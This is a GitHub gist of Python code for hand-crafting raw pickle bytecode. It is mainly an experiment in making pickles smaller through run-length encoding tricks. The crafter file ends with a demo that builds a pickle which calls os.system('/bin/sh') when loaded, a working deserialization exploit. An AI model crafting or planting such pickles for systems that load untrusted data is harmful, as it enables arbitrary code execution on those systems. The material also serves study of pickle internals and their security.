Skip to content

Instantly share code, notes, and snippets.

@Xornet-Euphoria
Last active February 29, 2024 12:52
Show Gist options
  • Save Xornet-Euphoria/0691ebe626ed1f6dfcc24884fde59e41 to your computer and use it in GitHub Desktop.
Save Xornet-Euphoria/0691ebe626ed1f6dfcc24884fde59e41 to your computer and use it in GitHub Desktop.
Pickle bytecode optimization (with my own script for crafting payload)
import pickle
import pickletools
import payload_crafter
class RunLengthCrafter(payload_crafter.Crafter):
    """Crafter that emits run-length style pickle payloads.

    A run ``[x] * length`` is produced at load time as
    ``getattr([x], "__mul__")(length)`` and several runs are concatenated with
    ``sum([l2, l3, ...], l1)``.

    NOTE(review): the memo indices used below (0 for ``getattr``, 1 for the
    string ``"__mul__"``) assume nothing was memoized on this crafter before
    the run-length helpers were called.
    """

    def __init__(self, *, check_stop=False) -> None:
        super().__init__(check_stop=check_stop)

    def create_single_element_list(self, x, length):
        """Append opcodes that evaluate to ``[x] * length``; return ``self``."""
        self.import_from("builtins", "getattr", use_stack=False)
        self._single_element_list_internal(x, length, is_first=True)
        return self

    def _single_element_list_internal(self, x, length, memo_idx=0, is_first=False):
        """Emit ``([x], "__mul__")`` -> REDUCE -> ``(length,)`` -> REDUCE.

        Expects the ``getattr`` callable to already be on the pickle stack.
        When ``is_first`` is true the string ``"__mul__"`` is pushed and
        memoized; otherwise it is fetched from memo slot ``memo_idx``.
        """
        # Build the one-element list [x].
        self.add_payload(pickle.EMPTY_LIST)
        self.push_int(x)
        self.add_payload(pickle.APPEND)

        if is_first:
            self.push_str("__mul__")
            self.memoize()
        else:
            self.get_memo(memo_idx)

        self.call_f(2)  # getattr([x], "__mul__")
        self.push_int(length)
        self.call_f(1)  # [x].__mul__(length)
        return self

    def create_run_length_single_element_list(self, x, length, memo_idx=0, is_first=False):
        """Append opcodes for one run, sharing ``getattr`` through the memo.

        With ``is_first`` true, ``getattr`` is imported and memoized (the
        original author expects this to land in slot 0); otherwise it is read
        back from memo slot ``memo_idx``. ``"__mul__"`` is always looked up in
        memo slot 1 for non-first runs.
        """
        if is_first:
            self.import_from("builtins", "getattr", use_stack=False)
            self.memoize()  # idx will be 0
        else:
            self.get_memo(memo_idx)
        return self._single_element_list_internal(x, length, memo_idx=1, is_first=is_first)

    # sum([l2, l3, ...], l1)
    # -> l1 + l2 + l3 + ...
    def run_length(self, t):
        """Append a complete payload (including STOP) for the runs in ``t``.

        ``t`` is a sequence of ``(value, length)`` pairs. The first pair
        becomes the ``start`` argument of ``sum`` and the remaining pairs
        become the summed list. Returns ``self``.
        """
        if not t:
            # No runs at all: the decoded value is simply an empty list.
            self.add_payload(pickle.EMPTY_LIST)
            self.stop()
            return self

        self.import_from("builtins", "sum", use_stack=False)

        # if len(t) < 4 then using pickle.TUPLE<n> is more optimized than pickle.MARK and pickle.LIST
        # note: sum([l2, l3, l4], l1) == sum((l2, l3, l4), l1)
        self.add_payload(pickle.MARK)
        for i, (x, length) in enumerate(t[1:]):
            self.create_run_length_single_element_list(x, length, is_first=(i == 0))
        self.add_payload(pickle.LIST)

        x, length = t[0]
        # With a single run nothing has been memoized yet, so the start list
        # must populate the memo itself instead of reading slots 0 and 1.
        self.create_run_length_single_element_list(x, length, is_first=(len(t) == 1))

        self.call_f(2)
        self.stop()
        return self
def search_boundary_list():
    """Print the smallest length (1..255) at which the crafted payload wins.

    For each length the crafted ``[1] * i`` payload is compared with
    ``pickle.dumps([1] * i)``; both must decode to the same value. The search
    stops at the first length where the crafted payload is strictly shorter.
    """
    for i in range(1, 256):
        org_p = pickle.dumps([1] * i)
        optimized_p = (
            RunLengthCrafter()
            .create_single_element_list(1, i)
            .get_payload(check_stop=True)
        )
        assert pickle.loads(org_p) == pickle.loads(optimized_p)

        l1 = len(optimized_p)
        l2 = len(org_p)
        if l1 >= l2:
            continue

        print(f"boundary length: {i}")
        print(f"- org: {l2}")
        print(f"- opt: {l1}")
        break
def test_run_length():
    """Check that a run-length payload decodes correctly and beats ``pickle.dumps``.

    Builds a list made of three runs, crafts its payload, disassembles it,
    prints its size in bytes, and asserts both round-trip equality and that
    the crafted payload is shorter than the standard pickle.
    """
    from itertools import groupby

    crafter = RunLengthCrafter()
    expected = [0] * 0x40 + [1] * 0x20 + [2] * 0x10
    runs = [(value, len(list(group))) for value, group in groupby(expected)]
    crafter.run_length(runs)

    res = crafter.loads()
    payload = crafter.get_payload(check_stop=True)
    pickletools.dis(payload)

    # run_length() already appended STOP, so the finalized payload's own
    # length is the real size; adding one more byte would over-count.
    size = len(payload)
    print(size)

    assert res == expected
    assert size < len(pickle.dumps(expected))
def test():
    """Run the boundary search, print a separator rule, then the run-length check."""
    search_boundary_list()
    print("=" * 40)
    test_run_length()
# Script entry point: run the experiments only when executed directly.
if __name__ == "__main__":
    test()
import pickle
class Crafter:
    """Builds a raw pickle byte stream by appending one opcode at a time.

    The accumulated bytes live in ``self.payload``. Nothing is validated while
    building; it is the caller's job to emit a sequence the unpickler accepts.
    """

    # Opcodes that build a tuple from the top 0..3 stack items without a MARK.
    _TUPLE_OPCODES = (
        pickle.EMPTY_TUPLE,
        pickle.TUPLE1,
        pickle.TUPLE2,
        pickle.TUPLE3,
    )

    def __init__(self, *, check_stop=False) -> None:
        self.payload = b""
        self.check_stop = check_stop  # reserved and not implemented yet

    # Merely a wrapper around `self.payload += b`, but it is meant to be
    # overridden, e.g. to trace what gets emitted while debugging.
    def add_payload(self, b: bytes) -> None:
        """Append raw bytes to the payload."""
        self.payload += b

    def push_int(self, n: int) -> None:
        """Push an integer using the shortest fixed-width integer opcode.

        0..0xff uses BININT1, 0..0xffff uses BININT2, and anything else that
        fits a signed 32-bit value (negatives included) uses BININT.

        Raises:
            NotImplementedError: if ``n`` does not fit in a signed 32-bit int.
        """
        if 0 <= n < 0x100:
            self._push_int1(n)
        elif 0 <= n < 0x10000:
            self._push_int2(n)
        elif -0x80000000 <= n < 0x80000000:
            self._push_int4(n)
        else:
            raise NotImplementedError("integer does not fit in a signed 4-byte BININT")

    def _push_int1(self, n: int) -> None:
        self.add_payload(pickle.BININT1)
        self._add_number1(n)

    def _push_int2(self, n: int) -> None:
        self.add_payload(pickle.BININT2)
        self._add_number2(n)

    def _push_int4(self, n: int) -> None:
        # BININT carries a signed little-endian 4-byte argument.
        self.add_payload(pickle.BININT)
        self.add_payload(n.to_bytes(4, "little", signed=True))

    def push_str(self, s: str) -> None:
        """Push a string.

        ASCII text keeps the SHORT_BINSTRING / BINSTRING opcodes. Non-ASCII
        text uses SHORT_BINUNICODE / BINUNICODE so that it decodes as UTF-8
        under the unpickler's default settings. The length prefix is always
        the number of encoded bytes, not the number of characters.
        """
        encoded = s.encode()
        length = len(encoded)
        assert length < 2**32

        if s.isascii():
            short_op, long_op = pickle.SHORT_BINSTRING, pickle.BINSTRING
        else:
            short_op, long_op = pickle.SHORT_BINUNICODE, pickle.BINUNICODE

        if length < 0x100:
            self.add_payload(short_op)
            self._add_number1(length)
        else:
            self.add_payload(long_op)
            self._add_number4(length)
        self.add_payload(encoded)

    # utils about list, tuple and dict
    def to_tuple(self, cnt: int = 0, use_mark: bool = False) -> None:
        """Emit a tuple-building opcode for ``cnt`` stack items.

        For 0..3 items (and ``use_mark`` false) the dedicated fixed-size
        opcode is used. Otherwise a plain TUPLE is emitted, which relies on a
        MARK the caller must already have pushed.
        """
        if cnt in range(0, 4) and not use_mark:
            self.add_payload(self._TUPLE_OPCODES[cnt])
        else:
            # todo: check whether MARK(@) is used in the payload
            self.add_payload(pickle.TUPLE)

    # utils about objects that is not pickle-native (import, function and etc)
    def import_from(self, module: str, name: str, *, use_stack=True) -> None:
        """Push the global ``module.name``.

        With ``use_stack`` true, both names are pushed as strings followed by
        STACK_GLOBAL; otherwise the newline-terminated text form of GLOBAL is
        emitted.
        """
        if use_stack:
            self.push_str(module)
            self.push_str(name)
            self.add_payload(pickle.STACK_GLOBAL)
        else:
            # shorter than STACK_GLOBAL
            # if other optimization techniques are used (for example, memoize frequently used strings)
            # this method may not be effective
            self.add_payload(pickle.GLOBAL)
            self.add_payload(module.encode("utf-8"))
            self._add_newline()
            self.add_payload(name.encode("utf-8"))
            self._add_newline()

    def call_f(self, argc: int = 0, use_mark=False) -> None:
        """Pack ``argc`` stack items into a tuple and REDUCE (call) with it."""
        self.to_tuple(argc, use_mark=use_mark)
        self.reduce()

    def reduce(self) -> None:
        self.add_payload(pickle.REDUCE)

    def stop(self) -> None:
        self.add_payload(pickle.STOP)

    # utils about memo
    # todo: emulate memo and estimate index in memoize
    # todo: put_memo
    def memoize(self) -> None:
        self.add_payload(pickle.MEMOIZE)

    def get_memo(self, idx: int) -> None:
        """Push the memo entry ``idx`` (BINGET below 0x100, text GET otherwise)."""
        if idx < 0x100:
            self.add_payload(pickle.BINGET)
            self._add_number1(idx)
            return

        # todo: pickle.LONGBINGET
        self.add_payload(pickle.GET)
        self._add_number(idx)
        self._add_newline()

    # interfaces about payload
    def get_payload(self, check_stop=False) -> bytes:
        """Return the payload; with ``check_stop`` append STOP if it is missing.

        The appended STOP is stored, so repeated calls do not add another one.
        """
        if check_stop and not self._is_terminated():
            self.stop()
        return self.payload

    def _is_terminated(self) -> bool:
        """Tell whether the payload's final byte is a real STOP opcode.

        A trailing ``b"."`` may also be the last byte of an opcode argument
        (e.g. BININT1 0x2e), so the stream is parsed rather than trusting the
        final byte alone. An empty payload is not terminated.
        """
        import pickletools

        if not self.payload.endswith(pickle.STOP):
            return False

        stop_pos = -1
        try:
            # genops stops after the first STOP opcode it decodes.
            for _opcode, _arg, pos in pickletools.genops(self.payload):
                stop_pos = pos
        except ValueError:
            # Ran out of bytes (the '.' was argument data) or could not parse.
            return False
        return stop_pos == len(self.payload) - 1

    def get_length(self, with_stop: bool = False) -> int:
        """Return the payload length, plus one when ``with_stop`` is true."""
        size = len(self.payload)
        return size + 1 if with_stop else size

    def loads(self, check_stop=False):
        """Unpickle the crafted payload and return the resulting object."""
        _payload = self.get_payload(check_stop)
        res = pickle.loads(_payload)
        return res

    def clear(self) -> None:
        self.payload = b""

    # utils for internal
    def _add_newline(self) -> None:
        self.add_payload(b"\n")

    def _add_number(self, n: int) -> None:
        # Decimal text form, as used by the text-mode opcodes.
        self.add_payload(str(n).encode())

    def _add_number1(self, n: int) -> None:
        self._add_number_to_bytes(n, 1)

    def _add_number2(self, n: int) -> None:
        self._add_number_to_bytes(n, 2)

    def _add_number4(self, n: int) -> None:
        self._add_number_to_bytes(n, 4)

    def _add_number_to_bytes(self, n: int, length: int) -> None:
        # Unsigned little-endian encoding in exactly `length` bytes.
        self.add_payload(n.to_bytes(length, "little"))
# Demo: craft a payload that calls os.system("/bin/sh") when unpickled.
# WARNING: running this module directly really does spawn a shell.
if __name__ == "__main__":
    payload = Crafter()
    payload.import_from("os", "system", use_stack=False)
    payload.push_str("/bin/sh")
    payload.call_f(1)

    pb = payload.get_payload(check_stop=True)
    print(len(pb))

    # Unpickling executes the crafted call; `r` is os.system's return value.
    r = pickle.loads(pb)
    print(r)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment